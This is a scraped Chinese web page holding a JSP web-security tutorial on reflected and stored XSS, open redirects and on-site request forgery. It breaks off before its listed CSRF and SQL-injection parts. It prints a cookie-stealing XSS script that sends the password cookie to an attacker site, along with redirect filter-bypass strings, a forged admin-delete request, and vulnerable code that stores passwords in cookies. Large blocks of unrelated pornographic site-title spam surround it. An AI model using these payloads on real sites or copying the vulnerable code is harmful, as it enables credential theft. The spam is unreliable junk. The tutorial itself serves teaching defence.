亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > JSP > 正文

從JSP 例子解析Web 安全編程實戰(zhàn)

2024-09-05 00:23:41
字體:
來源:轉載
供稿:網(wǎng)友
 

注:本文所有的例子雖然基于 JSP/Servlet 技術開發(fā),但是漏洞和解決方法的原理適用于其他 Web 技術。

Web 安全現(xiàn)狀

Web 安全現(xiàn)狀不容樂觀,近幾年也存在 Web 攻擊的重大實際案例,比如信息產(chǎn)業(yè)部官方報紙《中國電子報》網(wǎng)站被黑、大學生網(wǎng)絡銀行盜竊案等。另據(jù)調(diào)查顯示,目前網(wǎng)站常見攻擊手段中,SQL 注入、XSS 和跨站腳本攻擊占了很大部分。攻擊者往往沒有明確的目的性,有些攻擊并不能帶給他們利益,只是出于初學的好奇和攻擊成功的成就感,也就是說許多攻擊由于初學者引起的。實際上,像很多初學駭客的攻擊都可以被防御,只要我們了解其基本原理,就可以應付許多菜鳥駭客的攻擊,減少運維費用。所以文章再一次強調(diào) Web 程序員需要注意編程習慣,盡力保證網(wǎng)站的安全。

實戰(zhàn)

文章從實際的 JSP 例子出發(fā),盡力解釋安全問題產(chǎn)生的原因。這些例子代碼是本人初學 JSP,也是許多人在開始學習 JSP 時容易編寫的問題代碼。代碼看起來并沒有什么問題,但是往往存在巨大的漏洞。例子雖然簡單,卻很能說明問題。文章將用 6 個例子,分別講述 6 種 Web 攻擊手段及原理,以及程序員需要從哪些方便進行防御??梢詮膱D片介紹中查看效果。講解 6 種 Web 漏洞的順序如下表,讀者也可以選擇感興趣的部分點擊查看。

  • 反射型 XSS 漏洞
  • 保存型 XSS 漏洞
  • 重定向漏洞
  • 本站點請求漏洞
  • 跨站點請求漏洞
  • SQL 注入漏洞

在文章的附件代碼中,包含上述各個列表項的示例程序,每個列表項對應了單獨的項目文件夾,以漏洞名稱命名,可以直接使用 Jee Eclipse 打開。

問題代碼 --- 反射型 XSS 漏洞

反射型 XSS 漏洞是一種非常常見的 Web 漏洞,原因是由于程序動態(tài)顯示了用戶提交的內(nèi)容,而沒有對顯示的內(nèi)容進行驗證限制。因此這就讓攻擊者可以將內(nèi)容設計為一種攻擊腳本,并且引誘受害者將此攻擊腳本作為內(nèi)容顯示,而實際上攻擊腳本在受害者打開時就開始執(zhí)行,以此盜用受害者信息。

例子是動態(tài)顯示錯誤信息的程序,錯誤信息可以在 URL 中傳遞,顯示時服務器不加任何限制,符合反射型 XSS 攻擊的條件。


清單 1. index.jsp 主要代碼
 <form action="ReflectXSSServer" method="post">   用戶名:<input type="text" name="username" value=""/><br>   密   碼:<input type="password" name="password" value=""/><br>   <input type="submit" value="提交"/>  </form> 


清單 2. ReflectXSSServe.java 主要代碼
 String username = request.getParameter("username");  String password = request.getParameter("password");  // 添加用戶信息到 Cookie,方便下次自動登錄 addToCookie(“username”, username);  addToCookie(“password”, password);  request.getRequestDispatcher(" error.jsp?error=password is wrong!").forward(request, response); 


清單 3. error.jsp 主要代碼
 Error Message :<%=request.getParameter("error")%> 

index.jsp 作為用戶登錄界面,提交登錄請求給 ReflectXSSServe.java。ReflectXSSServe.java 處理登錄請求,將用戶名和密碼記錄到 cookie,方便用戶下次登錄。如果登錄信息錯誤 ( 例子代碼直接認為錯誤 ),就會跳轉到 error.jsp,顯示錯誤信息,錯誤信息是通過名為 error 的參數(shù)傳遞。

問題分析

代碼很簡單,似乎也很合邏輯,但是這個程序暴露出一個嚴重的問題就是錯誤信息是通過參數(shù)傳遞,并且沒有經(jīng)過任何處理就顯示。如果被攻擊者知道存在這樣一個 error.jsp,攻擊者就可以很容易的攻擊用戶并且獲得用戶的重要信息。

攻擊此程序

可以設計這樣一個 URL:http://localhost:8080/application/error.jsp?error=<script>var mess = document.cookie.match(new%20RegExp("password=([^;]*)"))[0]; window.location="http://localhost:8080/attacter/index.jsp?info="%2Bmess</script>。這看起來有點復雜,讓我們分析一下。http://localhost:8080/application/error.jsp?error= 這一部分,是 error.jsp 的地址,我們主要關心后面的錯誤信息內(nèi)容,這是一段 javascript 腳本,document.cookie.match(new%20RegExp("password=([^;]*)"))[0],這樣一句話,是為了獲得 cookie 中名為 password 的值。然后,通過 window.location 重定向到攻擊者的網(wǎng)站,并且把 password 作為參數(shù)傳遞過去,這樣,攻擊者就知道你的密碼了。后面,只需要讓被攻擊者登錄后點擊這個 URL 就可以了。

為了讓被攻擊者可以點擊這個 URL,攻擊者往往會構建能夠吸引被攻擊者的網(wǎng)頁,或者郵件,這個做法有個形象的稱呼:釣魚攻擊。當被攻擊者登錄應用系統(tǒng)后,cookie 就保存了用戶名和密碼信息。由于設計的 URL 的主體是收信任的網(wǎng)站,被攻擊者往往毫不猶豫的點擊攻擊者設計的 URL,那么設計好的 script 腳本被當做信息內(nèi)容嵌入到 error.jsp 中時,就會作為腳本開始執(zhí)行,用戶名和密碼也就被人盜取了。


圖 1. 用戶登錄界面


 

用戶輸入用戶名和密碼分別為 user 和 pass,登錄后受到釣魚攻擊,點擊了攻擊者設計的 URL。


圖 2. 誘使用戶點擊 URL


 

攻擊者設計的 URL 包含攻擊腳本,攻擊腳本執(zhí)行后,password 的內(nèi)容被傳到另一個網(wǎng)站,這個應用程序是 attacter(附件中也會包含),password 信息被記錄到攻擊者的數(shù)據(jù)庫。


圖 3. 攻擊成功界面

 

解決方法

盡量避免直接顯示用戶提交的數(shù)據(jù),應進行一定的過濾,比如對于數(shù)據(jù)中存在的 < 和 > 等符號需要進行編碼,這樣就可以防止腳本攻擊。

問題代碼 --- 保存型 XSS 漏洞

保存型 XSS 漏洞的危害會更大,它是將攻擊腳本保存到被攻擊的網(wǎng)頁內(nèi),所有瀏覽該網(wǎng)頁的用戶都要執(zhí)行這段攻擊腳本。

這個例子,模仿了一個論壇發(fā)表評論的網(wǎng)頁。對于用戶的評論,系統(tǒng)不加任何限制和驗證,直接保存到服務器的數(shù)據(jù)庫中(例子使用全局對象代替數(shù)據(jù)庫,作為例子演示)。并且當有其他用戶查看網(wǎng)頁時,顯示所有評論。


清單 4. saveXSS.jsp 主要代碼
 <jsp:useBean id="tl" scope="application" class="java.util.LinkedList"></jsp:useBean>  <%  String topic = (String)request.getParameter("topic");  if (topic != null && !topic.equals(""))  {  tl.add(topic);  }  %>  <div>  <% for(Object obj : tl)  {  String str = (String)obj;  %>  <div><%=str%><div/>  <% } %>  </div>  <form action="saveXSS.jsp" method="post"> 評論:<input type="text" name="topic"/><br>  <input type="submit" value="提交"/>  </form> 

這里用了一個應用級的 List 對象存放評論列表,只是為了演示方便。用戶可以在 form 中編寫評論內(nèi)容,提交到同一頁面 saveXSS.jsp,提交以后,List 對象增加這個評論,并且顯示出來。

問題分析

這個程序符合了保存型 XSS 攻擊的所有條件,沒有限制評論內(nèi)容,程序會保存所有評論,顯示給查看網(wǎng)頁的用戶。只要攻擊者將攻擊腳本作為評論內(nèi)容,那么所有查看評論的用戶都將執(zhí)行這段攻擊腳本而受到攻擊。

攻擊此程序

攻擊這個程序所需要設計的攻擊腳本和上文的錯誤顯示內(nèi)容一樣,但是需要注意的是這次不需要編碼,%20 改為空格,而 %2B 則變?yōu)?+,原因是上例是通過 URL 傳遞數(shù)據(jù),而本例是直接通過表單傳遞數(shù)據(jù),攻擊腳本:<script>var mess = document.cookie.match(new RegExp("password=([^;]*)"))[0]; window.location="http://localhost:8080/attacter/index.jsp?info="+mess</script>,將這個內(nèi)容作為評論發(fā)表,那么當其他用戶查看這個網(wǎng)頁時,攻擊腳本代碼被當做內(nèi)容嵌入到網(wǎng)頁中,攻擊腳本就被觸發(fā)執(zhí)行,用戶就會受到攻擊,腳本執(zhí)行過程和反射型 XSS 攻擊一致。


圖 4. 評論界面


 

發(fā)表的內(nèi)容是攻擊者設計的一個攻擊腳本,這個腳本被直接保存到了網(wǎng)頁中。任何查看此頁面的其他用戶,他們的信息都會被盜取。


圖 5. 提交攻擊腳本


 

>解決方法

對于保存型 XSS 漏洞,由于我們無可避免的需要顯示用戶提交的數(shù)據(jù),所以過濾是必然的,過濾 < 和 > 等符號可以避免上述漏洞的發(fā)生。

問題代碼 --- 重定向漏洞

如果應用程序提取用戶可控制的輸入,并使用這個數(shù)據(jù)執(zhí)行一個重定向,指示用戶的瀏覽器訪問一個不同于用戶要求的 URL,那么就會造成重定向漏洞。

例子允許用戶輸入一個重定向路徑,由服務器執(zhí)行跳轉。


清單 5. index.jsp 主要代碼
 <form action="Redirect">     地址:<input name="target" type="text"><br>      <input type="submit" value="提交">  </form> 


清單 6. Redirect.java 主要代碼
 String param = request.getParameter("target");  if (param != null && !param.equals(""))  {  response.sendRedirect(param);  } 

用戶在 index.jsp 的表單中輸入跳轉的路徑,服務器端的 Redirect.java 執(zhí)行 sendRedirect 重定向。

問題分析

程序允許讓用戶設置重定向地址,而并沒對地址內(nèi)容進行驗證處理,而是直接跳轉,那么攻擊者完全可以設計一個攻擊 URL,其中包含攻擊者設計的攻擊內(nèi)容,使用釣魚攻擊,誘使用戶點擊此 URL,受到攻擊。

攻擊此程序

設計 URL:http://www.baidu.com,這里只是以跳轉作為例子,并沒有構建真正有害的網(wǎng)站,所以使用普通地址作為演示,假設這個地址有許多有害信息。其中 http:// 頭部非常重要,它可以讓服務器執(zhí)行絕對跳轉,跳轉到 www.baidu.com。如果沒有 http:// 就會跳轉到系統(tǒng)的相對路徑。


圖 6. 輸入路徑


 

點擊提交,網(wǎng)頁就會跳轉到百度界面。

有人試圖這樣處理跳轉路徑 param:param = param.replaceFirst("http://", ""); 將第一個 http:// 替換為空字符串,認為這樣可以解決問題,但是攻擊者往往也很聰明,他會將 URL 改為 : http://http://, 即使替換了第一個,第二天 http:// 就會生效。那么如果對 param 這么處理呢:param = param.replaceAll("http://", ""); 將所有的 http:// 都替換,那么攻擊者可以將 URL 設計為 hthttp://tp://,將中間的 http:// 替換為空后,ht 和 tp:// 組合又變?yōu)?http://,攻擊又一次生效 , 因此,我們需要一個更加全面的考慮。

解決方法

避免由用戶決定跳轉的頁面,如果必須這么做,路徑中只允許出現(xiàn) /以及 數(shù)字或者 英文字符可以一定程度的避免這個問題。

問題代碼 --- 本站點請求漏洞

本站點請求偽造(on-site request forgery,OSRF)是一種利用保存型 XSS 漏洞的常見攻擊有效載荷。是攻擊者設計攻擊代碼,保存到被攻擊網(wǎng)頁上,當普通用戶或者管理員查看頁面時,攻擊代碼就會執(zhí)行,此攻擊代碼的目的是偽裝成查看網(wǎng)頁的用戶向服務器發(fā)出請求。

這是一個發(fā)布圖像的論壇例子,用戶可以輸入圖像 URL,論壇負責讀取此 URL 進行顯示。

img.jsp 與前文的 saveXSS.jsp 代碼相同,只是這次顯示不再是字符串,而是需要將

<div><%=str%><div/> 改為 <div><img src=<%=str%> width=50 height=50/><div/>,目的是顯示用戶上傳的圖像。


清單 7. admin.jsp 主要代碼
 <%  String username = (String)request.getParameter("username");  System.out.println("delete " + username);  %>  <%=username%> 

admin.jsp 是管理員用于刪除用戶的請求處理程序,admin.jsp 實際上應該會判斷是否是管理員賬戶,如果是才允許執(zhí)行刪除用戶的操作。本文例子假設請求的確為管理員發(fā)出。

問題分析

這個程序明顯存在著保存型 XSS 漏洞,并且上傳的內(nèi)容被作為圖像 URL,img 標簽是本站點請求漏洞的敲門器,因為 img 始終會執(zhí)行 src 屬性的 URL 請求,而不管 src 指向的是否是真正的圖像。這個程序并沒有對 src 是否是圖片地址進行驗證,因此可以偽造請求。

攻擊此程序

將上傳的圖像 URL 設計為:admin.jsp? username=hello,提交上去后,從攻擊者的角度看,只是圖片沒有顯示,因為攻擊者并不是管理員,所以實際上無法刪除 hello 這個用戶。但是當管理員打開這個頁面時,img 標簽就會執(zhí)行 admin.jsp? username=hello 的請求,請求刪除 hello 用戶,由于的確是管理員發(fā)出的請求,服務器執(zhí)行刪除操作,刪除了 hello 用戶,攻擊者的目的也就達到了。


圖 7. 輸入攻擊 URL


 


圖 8. 攻擊者提交 URL

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
免费日韩一区二区三区| 亚洲人成网站在线观看播放| 色版视频在线观看| 欧美天堂亚洲电影院在线观看| 久久久久一本一区二区青青蜜月| 成全在线观看免费完整动漫| 国产精品涩涩涩视频网站| 噜噜噜久久亚洲精品国产品麻豆| 尤物在线免费视频| 成人高清视频免费观看| 国产一区免费视频| 国产麻豆精品一区二区三区v视界| 曰本三级日本三级日本三级| 视频一区在线免费看| 有坂深雪av一区二区精品| 精品久久久国产精品999| 在线观看毛片视频| 最新黄色av网站| 欧美精品一区二区三区久久久竹菊| eeuss影院18www免费| 久久久久亚洲AV成人无在| 黄色网址中文字幕| 日韩av在线播放资源| 91chinesevideo永久地址| 亚洲free性xxxx护士hd| 亚洲国产精品t66y| 一卡二卡3卡四卡高清精品视频| 涩涩涩久久久成人精品| 日本一区二区免费高清| 不卡一区2区| 一区在线视频观看| 久久精品国产亚洲AV无码麻豆| 91精品国产乱码在线观看| 色偷偷久久一区二区三区| 黄色网址电影| 公侵犯人妻一区二区三区| 在线heyzo| 黄色影院在线观看| 久久久精品人体av艺术| 亚洲国产日韩美| 成人h动漫精品| 亚洲av永久纯肉无码精品动漫| av影院在线免费观看| 国产精品毛片一区二区三区| 亚洲男男gay视频| 五月婷婷激情视频| 日韩精品成人免费观看视频| 日韩美女一区二区三区四区| 中文字幕亚洲欧美日韩在线不卡| 中文字幕精品在线观看| 亚洲免费成人在线视频| 亚洲第一精品在线观看| 欧美69xx性欧美| 国产精品综合在线视频| www.男人天堂.com| 日日夜夜综合| 爆操妹子视频在线观看| 国产精品一区二区在线观看不卡| 国产精品综合久久| 日产精品高清视频免费| 欧美深深色噜噜狠狠yyy| 亚洲精品国产无天堂网2021| 伊人无码高清| 欧美中日韩免费视频| 揄拍成人国产精品视频| 亚洲激情在线播放| 日本免费久久高清视频| 久久精品视频国产| 天天爱天天干天天操| aa国产精品| 色偷偷久久一区二区三区| 在线天堂日本| 欧美国产精品劲爆| 成人av网页| 98在线视频| 国内精品国产成人国产三级| 一区二区三区视频免费| 国产一区二区三区高清播放| 欧美激情一区二区三区全黄| 亚洲国产精品yw在线观看| 欧日韩在线观看| 啊啊啊国产视频| 亚洲最大成人av| 成人精品一区二区三区电影黑人| 你懂的免费网站| 天堂中文资源在线| 亚洲精品无码国产| 99精产国品一二三产品香蕉| 欧美一区二区不卡视频| 免费一级淫片| 香蕉乱码成人久久天堂爱免费| 日韩三级电影| 欧美三区在线视频| 久久永久免费视频| 男女一区二区三区| 欧美成人性生活视频| 无码一区二区三区视频| 五月天中文字幕一区二区| 色999久久久精品人人澡69| 日韩在线视频线视频免费网站| 日韩电影在线观看一区二区| 中文字幕一区二区三区免费看| 欧美精美视频| 国产美女免费视频| sm捆绑调教国产免费网站在线观看| 中文幕无线码中文字蜜桃| 日韩三级在线播放| 狠狠色丁香久久婷婷综合_中| 国产亚洲精品成人av久久ww| 欧美浪妇xxxx高跟鞋交| 国产精品久久久久一区二区| 国产精品三级在线观看无码| 91视频99| 无圣光视频在线观看| 国产成人一区二区| 五月天电影免费在线观看一区| 欧美精品在线一区二区| 日本19禁啪啪吃奶大尺度| 97干在线视频| 一区二区三区短视频| 国产一区二区美女视频| ,一级淫片a看免费| 亚洲精品一区二区三区影院忠贞| 国产一级特黄a大片免费| 亚洲最大成人| 国产精品va在线观看视色| 一区二区三区四区不卡| 99久热re在线精品996热视频| 91精品国产成人观看| 国产午夜手机精彩视频| 久久久久久91香蕉国产| 日韩最新av在线| jvid福利在线一区二区| 欧美xxxx黑人又粗又长密月| 91九色在线看| jizz在线观看中文| 亚洲精品久久久久久久久久久久久| 亚洲人成绝费网站色ww| 国产成人免费高清视频| 麻豆国产91在线播放| 夜夜狂射影院| 午夜欧美性电影| 国产日产欧美精品一区二区三区| 日韩国产高清影视| 久久精品系列| 99免费视频观看| 超碰成人在线观看| 日本美女视频一区二区| 国产美女诱惑一区二区| 国产色综合一区二区三区| 影音av在线| 精品国产aⅴ| 国产精品久久久网站| 亚洲女人毛茸茸高潮| 一区免费在线| 香蕉久久夜色精品国产使用方法| 青青青青久久精品国产一百度| 在线最新版中文在线| 一区二区视频欧美| 一区二区三区在线视频观看58| 欧美午夜电影在线播放| 我的公把我弄高潮了视频| 在线免费观看视频网站| 青青草原成人在线视频| 99久久精品免费看国产四区| 第四色男人最爱上成人网| 午夜av在线免费观看| 欧洲精品在线播放| 久久精品综合一区| 在线电影院国产精品| 91福利在线免费观看| 欧美影院一区二区| 91在线九色porny| 在线亚洲伦理| 中国免费黄色片| 亚洲国产成人久久综合一区| 三级小说欧洲区亚洲区| 日韩电影天堂视频一区二区| 成人在线免费| 国产三级做爰高清在线| www.污污视频| 久久欧美肥婆一二区| 综合久久综合| 9191精品国产综合久久久久久| 人人精品视频| 亚洲欧美日韩一级| 日韩性生活视频| 可以在线看的av| 亚洲色图16p| a视频在线看| 成人综合婷婷国产精品久久| av中文天堂在线| 国产精品嫩草av| 97在线精品| 性欧美孕妇孕交| 国产婷婷色一区二区三区| 亚洲色图校园春色| 极品美乳网红视频免费在线观看| 日本一区二区不卡| 午夜亚洲成人| 91在线看国产| 国产精品久久久久久久第一福利| 91丨九色丨蝌蚪丨对白| 91成人在线免费| 日本xxxx人| 亚洲午夜电影在线| 欧美黄色一级| 日韩av网站大全| 欧美成人精品xxx| 久久99精品国产| 欧美日韩三级在线观看| 欧美一区二区三区| 青青在线视频| 狂野欧美性猛交xxxx乱大交| 亚洲精品国精品久久99热一| 9l亚洲国产成人精品一区二三| 亚洲精品一区二区三区福利| 久久精品久久久久电影| 久久久精品国产99久久精品芒果| 在线不卡欧美| 李丽珍裸体午夜理伦片| 国产欧美一区二区三区鸳鸯浴| 久久精品国亚洲| 国产免费大片| 激情综合网俺也去| 亚洲一区在线免费| 麻豆国产va免费精品高清在线| 欧美午夜精品一区| 中文字幕av在线一区二区三区| 国产精品日本欧美一区二区三区| 精品高清美女精品国产区| 久久久日本电影| 色就是色欧美色图| 成人毛片100部免费看| xxxxbbbb欧美| 免费网站在线观看人| 久久精品国产免费看久久精品| 亚洲欧洲日本国产| 久久中文字幕av一区二区不卡| 国产成人无码专区| 亚洲无吗在线| 亚欧在线观看视频| 日韩欧美视频第二区| 91福利视频久久久久| 亚洲午夜av在线| 美女精品在线观看| 国产乱国产乱老熟| 免费黄色影片在线| 在线观看精品视频看看播放| 香蕉视频黄在线观看| 制服丝袜亚洲精品中文字幕| xx视频.9999.com| 日韩成人在线观看视频| 国产午夜亚洲精品不卡| 欧美一级在线播放| 欧美91福利在线观看| 日本女人黄色片| 日韩欧美在线视频免费观看| **性色生活片久久毛片| 亚洲高清成人| 美女毛片一区二区三区四区最新中文字幕亚洲| 青青青在线免费观看| 国产又爽又黄免费视频| 亚洲综合偷拍欧美一区色| 日韩va欧美va亚洲va久久| 极品尤物av丝袜美腿在线观看| 99视频资源网| 国产视频一视频二| 欧美丝袜第一区| www.五月天激情| 丁香五月缴情综合网| 久久久久久久久久97| 中文字幕免费在线视频| 国产欧美一区二区精品仙草咪| 国产精品扒开腿做爽爽| 添女人荫蒂视频| 亚洲欧美成aⅴ人在线观看| 成人动漫中文字幕| 日韩精品视频免费在线观看| jizz国产| 国产乱人伦偷精品视频不卡| 国产二区不卡| 国产美女主播视频一区| 天天色天天操综合| 天天综合网天天综合| 男女男精品视频| 欧美视频在线一区| 欧美黄色免费看| 国产一区二区三区无遮挡| 综合激情视频| 免费在线看黄网站| 成人观看免费视频| 黑人与娇小精品av专区| 国产成人自拍一区| 国产成人精品免费视| 欧美videos巨大粗暴| 天堂аⅴ在线最新版在线| 欧美人成在线观看ccc36| 瑟瑟视频在线观看| 久久这里只有精品国产| 琪琪第一精品导航| 欧美hentaied在线观看| 91av在线免费播放| 在线播放国产区| 国产精品99久久久久久久女警| 国产精品10p综合二区| 日韩欧美在线字幕| 中文字幕在线网| 性网爆门事件集合av| 亚洲一级片免费观看| 精品欧美日韩精品| 欧美日韩另类图片| 国产精品人人爽人人爽| 九九综合九九综合| 免费中文字幕在线| 国产精品入口免费| 欧美精品电影免费在线观看| 国产成人99久久亚洲综合精品| 亚洲无av在线中文字幕| 69久久夜色精品国产7777| 少妇大叫太大太粗太爽了a片小说| 久久99国产精品二区高清软件| 136国产福利精品导航| 欧美一区二区三区婷婷月色| 欧美精品在线一区| 一区二区三区视频国产日韩| heyzo一本久久综合| 日韩精品导航|